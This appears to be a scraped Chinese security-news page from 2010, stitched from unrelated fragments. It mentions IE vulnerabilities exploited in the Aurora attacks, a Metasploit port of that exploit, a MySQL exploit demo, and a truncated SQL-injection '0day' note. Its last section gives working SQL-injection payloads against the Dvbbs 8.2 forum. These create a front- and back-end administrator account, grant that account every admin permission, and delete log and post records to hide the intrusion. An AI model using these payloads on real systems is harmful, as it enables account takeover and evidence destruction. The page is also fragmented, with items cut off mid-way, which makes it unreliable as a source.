消息来源:http://www.cert.org.cn/articles/bulletin/common/2010031024864.shtml
安全漏洞:CN-VA10-27 阅读全文
发布日期:2010年03月10日
漏洞类型:远程执行代码
漏洞评估:严重
受影响的系统:
Windows 2000平台上的Internet Explorer 6 SP1
Windows XP平台上的Internet Explorer 6、Internet Explorer 7
Windows Server 2003 平台上的Internet Explorer 6 、Internet Explorer 7
Windows Vista 平台上的Internet Explorer 7
Windows Server 2008 平台上的Internet Explorer 7
睛天电影系统 Sql Injection Vulnerability 0day
Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp
Code: 阅读全文
<%
IF Not ChkPost() Then
response.Redirect G_error_page_1
response.End()
End IF
可靠消息透露,微软将在当地时间2010年1月21日公布之前造成巨大影响的Internet Explorer 6, 7 , 8版本远程代码执行漏洞的补丁.
该漏洞曾引发Google在内的多家公司网络被攻破,同时攻击代码也已经在互联网不断蔓延,多国政府向国民发出安全警告,提示暂时停用IE.本次更新也是 微软今年首次Patch Tuesday以外的紧急非计划更新,影响的Windows版本有:2000,XP,Vista,7,2003和2008.
查看:Microsoft Security Bulletin Advance Notification for January 2010
1月22日更新:
周四,微软发布了重要的Internet Explorer的累计补丁,总共修复了8个漏洞,其中包括导致Google在内的多家公司被攻击的漏洞。
本次安全更新涉及IE5/6/7/8四个版本,问题的严重性包括可以允许远程执行代码,安装该更新后可以消除一系列来自IE的漏洞,并可以减少受攻击的风 险,微软建议客户尽快部署防范已知攻击的安全更新。与此同时,趋势科技和赛门铁克公司周四表示,他们已找到新的恶意软件样本,利用IE漏洞进行攻击。
Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.
To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:
阅读全文
据国外媒体消息,美国时间2010年1月14日下午1点,IE浏览器被暴露出一个0day高危的远程执行代码漏洞,这波0DAY的影响包括但不限于微软IE浏览器。据美国媒体称,这次被黑客攻击的30多家美国公司,包括但不限于Google,Adobe,Yahoo,Symantec,Northrop Grumman,Dow Chemical。
具体信息可以参考SecurityFocus(http://www.securityfocus.com/bid/37815/info)的描述,微软也对此发布了一个安全公告979353(http://www.microsoft.com/technet/security/advisory/979352.mspx)。根据微软的说法,此次漏洞影响到从Windows 2000 SP4 中的IE6一直到最新版本的Windows Server 2008 R2和Windows 7中的IE8,仅有较老版本的IE5未受影响。目前微软尚未获取足够的攻击信息来对此次漏洞进行分析,微软表示将继续跟踪、检测此次威胁,并将更新安全通告。同时,微软提醒客户,注意增强主机安全防火,请密切关注微软安全通告,以获取最新的补丁文件,避免系统遭到危害。
阅读全文
http://hi.baidu.com/3w417/blog/item/1a47cf35d4f8af1a90ef3932.html
Intevydis 公开了一段视频,在他们 VulnDisco exploit pack for CANVAS 产品中有一个MySQL的远程EXP,可以打 MySQL 5.x,好像挺慢的。
http://intevydis.com/mysql_demo.html
Dvbbs 8.2
DVBBS是一款由WWW.ASPSKY.NET开发和维护的开放源码Asp论坛程序。
暂无
*>
发帖子,标题为下面的sql语句,然后点评论。0为中立, 1为支持, 2为反对 都行。
这时sql语句被执行
库名:a','',1,'akai','2008-2-4','',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username='akai'--
复制代码加前台和后台管理员:a','',1,'akai','2008-2-4','',2);update dv_user set UserGroupID=1 where username='akai';insert into dv_admin(Username,Password,Flag,Adduser)values('akai','965eb72c92a549dd',',4,','akai')--
复制代码进入后台,通过注入再获取全部权限:http://www.xxx.com/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45'/**/where/**/username='akai'--
复制代码清理数据库记录(有三个表):http://www.xxx.com/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username='akai';delete/**/from/**/dv_topic/**/where/**/PostUsername='akai';delete/**/from/**/Dv_Appraise/**/where/**/UserName='akai'--
复制代码(因为是通过后台注入来执行delete语句,所以最后Dv_log还是有一条关于后台help.asp文件访问记录)
暂无 请参考官方补丁 www.dvbbs.net
